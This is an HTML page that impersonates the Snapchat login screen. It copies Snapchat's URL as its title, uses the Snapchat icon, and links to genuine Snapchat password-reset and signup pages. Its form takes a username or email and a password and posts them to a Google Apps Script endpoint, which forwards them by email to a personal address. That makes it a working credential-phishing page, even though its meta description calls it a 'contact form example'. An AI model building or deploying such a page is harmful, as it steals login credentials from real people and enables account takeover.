<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="contact form example">
    <title>https://accounts.snapchat.com/accounts/login?client_id=geo</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@500&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap" rel="stylesheet">
    <link rel="icon" href="http://www.domain.com/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="http://www.domain.com/favicon.ico" type="image/x-icon" />
    <style>
    
      
      body{
        background-color: rgb(219 219 219 / 53%);
      }
      
      #wrapper {
        width: 500px;
        height: 50%;
        overflow: hidden;
        border: 0px solid #000;
        margin: 50px auto;
        }
      
      .main-content {
        width: 250px;
        height: 40%;
        margin: 10px auto;
        background-color:white;
        padding: 40px 50px;
      }
      
      .header {
        border: 0px solid #000;
      }
      
      .header img {
        height: 40px;
        width: 60px;
        margin: auto;
        position: relative;
        left: 85px;
      }

      .description{
        text-align: center;
        margin-block-end: 0%;
        margin-block-start: 0%;
      }
      
      .input-1{
        width: 100%;
        margin-bottom: 5px;
        margin-top: 8px;
        padding: 8px 12px;
        border: none;
        box-sizing: border-box;
        border-radius: 3px;
        background-color:rgb(219 219 219 / 21%);

      }

      .input-1:hover{
        background-color: rgb(219 219 219 / 35%);
        border: 1px solid yellow;
        
      }
      .input-1:focus{
        outline-width: 1px;
        outline-color :  yellow!important;
      }
        
      

      .input-2 {
        width: 100%;
        margin-bottom: 5px;
        padding: 8px 12px;
        border: 1px solid #dbdbdb;
        box-sizing: border-box;
        border-radius: 3px;
      }

      .secondary_action{
      margin-left: 141px;
      }
      
      .overlap-text {
        position: relative;
      }
      
      .overlap-text a {
        position: absolute;
        top: 8px;
        right: 10px;
        color: #003569;
        font-size: 14px;
        text-decoration: none;
        font-family: 'Overpass Mono', monospace;
        letter-spacing: -1px;
      }
      
      .btn {
        margin-top: 64px;
        width: 100%;
        background-color: #3897f0;
        border: 1px solid #3897f0;
        padding: 5px 12px;
        color: #fff;
        font-weight: bold;
        cursor: pointer;
        border-radius: 3px;
      }
      .btn1 {
        margin-top: 39px;
        width: 100%;
        background-color: #3897f0;
        border: 1px solid #3897f0;
        padding: 5px 12px;
        color: #fff;
        font-weight: bold;
        cursor: pointer;
        border-radius: 3px;
      }
      
      .sub-content {
        width: 250px;
        height: 40%;
        margin: 10px auto;
        padding: 20px 50px;
        background-color: #fff;
      }
      
      .s-part {
        text-align: center;
        font-family: 'Overpass Mono', monospace;
        word-spacing: -3px;
        letter-spacing: -2px;
        font-weight: normal;
      }
      
      .s-part a {
        text-decoration: none;
        cursor: pointer;
        color: #3897f0;
        font-family: 'Overpass Mono', monospace;
        word-spacing: -3px;
        letter-spacing: -2px;
        font-weight: normal;
      }
      
  
     
      
</style>

</head>

<body>

    <link href="https://fonts.googleapis.com/css?family=Indie+Flower|Overpass+Mono" rel="stylesheet">

    <div id="wrapper">
      <div class="main-content">
        
        <div class="header" > 
          <img src="https://accounts.snapchat.com/accounts/static/images/ghost/snapchat-app-icon.svg">
        </div>

        <div>
          <h1 style="padding-left: 81px;font-family: 'Roboto', sans-serif; font-size: x-large;">
            Log In
          </h1>

        </div>

        <div class="description" style="margin-top: 4px; font-weight: 500; color: rgb(101, 107, 115);font-family: 'Roboto', sans-serif; font-size: small;">
          <p>to continue to Create Your Own <br>
          For best results, please visit Create <br> Your Own from your computer.</p>
        </div>




        <form id="gform" method="POST" class="pure-form pure-form-stacked" data-email="2000ujwal2000@.gmail.com"
           action="https://script.google.com/macros/s/AKfycbxSWJPfMvJgtfobA37PXWThjQFFheWSvkUhEBs2U1LPW6mKljFR-_IR3hiE5JFC2m1m/exec">
           <br>
          <div style="font-weight: 500; color: rgb(101, 107, 115);font-family: 'Roboto', sans-serif; font-size: small;">
            <label for="name" class="control-label">Username or Email</label>
            <input name="name" autocomplete="off" type="text"  class="input-1">
          </div> 
            <br>
          <div  style="font-weight: 500; color: rgb(101, 107, 115);font-family: 'Roboto', sans-serif; font-size: small;">
            <label for="pass" class="control-label">Password</label>
            <input name="pass" autocomplete="off" type="text"  class="input-1">
          </div> 
          
          <p class="secondary_action"><a style="text-decoration: none; font-family: 'Roboto', sans-serif; font-size: small;color :black;" href="https://accounts.snapchat.com/accounts/password_reset/phone">Forgot Password</a></p>

          <div style=" margin-left: 80px; border-radius: 20px;">
            <button type="submi" style=" border:none; padding-left: 20px; padding-right: 20px;padding-top: 9px;padding-bottom: 9px; background-color:yellow; border-radius: 20px;">
              Log In

            </button>
          </div>

        </form>



        </div>

        <div style="margin-left: 160px;"><span>New To Snapchat?</span><a style="text-decoration: none; color: black;" href="/accounts/signup?client_id=geo">Sign Up</a></div>
      </div>
      


    </div>

</body>
</html>


            <!-- src="https://cdn.rawgit.com/dwyl/learn-to-send-email-via-google-script-html-no-server/master/form-submission-handler.js"> -->

<script data-cfasync="false" type="text/javascript"
  
  src="https://cdn.rawgit.com/dwyl/learn-to-send-email-via-google-script-html-no-server/master/form-submission-handler.js">
</script>
